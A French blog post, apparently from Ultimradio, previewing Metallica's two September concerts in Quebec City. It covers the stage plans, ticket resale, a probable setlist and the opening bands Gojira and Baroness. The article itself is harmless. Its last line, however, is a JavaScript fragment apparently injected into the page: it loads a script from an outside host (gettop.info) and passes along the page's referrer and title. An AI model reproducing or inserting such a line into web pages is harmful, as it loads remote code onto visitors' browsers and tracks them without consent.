Salut à tous !
Encore aujourd’hui, on sort un peu des sentiers battus pour vous offrir un article un peu différent qu’à l’habitude.
Cette fois ci, nous parlerons de la venue du légendaire groupe Metallica à Québec pas pour une représentation…mais bien deux une en arrière de l’autre.

Comme vous le savez surement, le groupe Metallica sera de passage à Québec pour deux représentations.
Le premier spectacle aura lieu le 14 septembre prochain, au Colisée Pepsi. Je vous rappelle que ce spectacle va ‘’fermer’’ l’ancien Colisée de Québec.
La deuxième représentation aura lieu deux jours plus tard, soit le 16 septembre mais cette fois-ci, au Centre Vidéotron.

Ceci sera sans doute un évènement marquant pour la ville de Québec. C’est banal vous me direz mais je vous rappelle que c’est le band Metallica lui-même qui c’est proposé de fermer l’ancien Colisée et d’ouvrir le nouveau. Beaucoup d’entre nous avions pensé que ce projet ne se réaliserait jamais et que nous aurions droit à des artistes québécois à la place, alors ce fût quand même une bonne surprise d’apprendre que le tout était officiel il y a de ça quelques mois.

Lors d’une vidéo réalisée par Lars Ulrich, le batteur du groupe, il informait les gens que les deux spectacles seraient différents. Premièrement, lors du spectacle au Colisée Pepsi, la scène sera placée à un des bout de la patinoire et ce sera un peu ‘’old school’’. Pour ce qui est du spectacle au Centre Vidéotron, la scène sera tant qu’à elle, au centre de la glace. On peut donc penser à une scène 360°. Selon lui, la setlist sera surement aussi différente d’un soir à l’autre, ce qui ne peut qu’être bénéfique pour ceux qui assisteront aux deux représentations. Pour ma part, je crois que le premier soir sera vraiment ‘’Old School’’. De vieilles chansons qu’on entends plus rarement en ‘’live’’ et de bon vieux hits. Pour le deuxième soir, je crois que ce sera des chansons un peu plus récentes et qui sais, le band vas peut-être en profiter pour jouer de nouvelles chansons tirés de leur prochain album à paraître prochainement…croisons les doigts.

Le groupe est plus qu’aimé par les fans de Québec. Juste à se souvenir de la foule monstre qui a été enregistrée lors de leur dernière visite sur les Plaines d’Abraham. Une foule estimée à plus de 100 000 personnes selon l’organisation du Festival d’été de Québec. Donc à chaque fois que Metallica est à Québec, c’est un peu la folie qui s’empare de tous et leur venue à Québec la semaine prochaine n’y échappe pas.
Dès que les spectacles ont été officialisés, beaucoup de gens se sont inscrits au fan club de Metallica pour être sur d’avoir des billets pour ces deux spectacles. Je peux valider que ce fût un très bon ‘’move’’ de leur part car pour ceux qui n’ont pas fait partis du fan club lors de la vente des billets, ce fût très difficile d’avoir des billets, voir impossible pour beaucoup. En effet, seulement quelques minutes après la mise en vente, il ne restait quasiment plus rien. Par contre, quelques minutes plus tard, beaucoup de billets étaient à vendre sur des sites comme Kijiji à des prix plus que ridicules. Les revendeurs de billets ont donc profité de l’occasion pour se garnir un peu les poches et une ‘’guerre’’ entre fans et revendeurs à éclatée sur les réseaux sociaux. À l’heure où je vous parle, le prix des billets en revente ont peu diminués mais ils restent quand même plus élevés que la valeur originale.

Si on se base sur la setlist du dernier spectacle que le groupe à donné, le 30 Août dernier, voici à quoi pourrait ressembler l’un ou l’autre des spectacles présentés à Québec.
– Fuel
– For Whom The Bell Tolls
– Blackened
– King Nothing
– Ride The Lightning
– The Day That Never Comes
– The Memory Remains
– The Unforgiven
– Sad But True
– Turn The Page
– The Frayed Ends of Sanity
– One
– Master Of Puppets
– Fade To Black
– Seek And Destroy
— encore —
– Whiskey in the Jar
– Nothing Else Matters
– Enter Sandman

INFO RAPIDE : En écrivant ces lignes, j’ai vu que quelques billets venaient d’être débloqués pour le spectacle du 14 au Colisée Pepsi. Je ne sais pas combien et si les places sont bonnes, mais si vous en voulez, dépêchez vous avant qu’il ne soit trop tard !!!

Pour ceux qui se demandes qui seront les premières parties pour chaque spectacle, tout porte à croire que ce sera les groupes suivants :
Pour le spectacle du 14, au Colisée Pepsi, ce serait nul autre que le band Gojira.
Pour le spectacle du 16, au Centre Vidéotron, ce serait le groupe Baroness.

Pour conclure, Québec à marqué un très grand coup en acceptant l’offre du légendaire groupe trash Metallica. Les deux soirées risquent d’être endiablées. Avec deux spectacles différents, tant musicalement que les décors et la scène, le groupe chouchou des québécois va nous donner tout un ‘’show’’…excusez moi, vas plutôt nous donner DEUX ‘’shows’’ que personne n’est près d’oublier.

Et vous, y serez vous ?
Si oui, pour les deux soirs ou seulement qu’un ?

Sur ce, si vous êtes de la partie pour l’un ou l’autre des shows, je vous souhaite une excellente soirée!
Et n’oubliez pas de continuer à suivre régulièrement la page facebook d’Ultimradio et le site web www.ultimradio.com pour d’autres articles, critiques, photos et tout autres nouvelles musicales.

Rock On !

Christopher Drouin.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;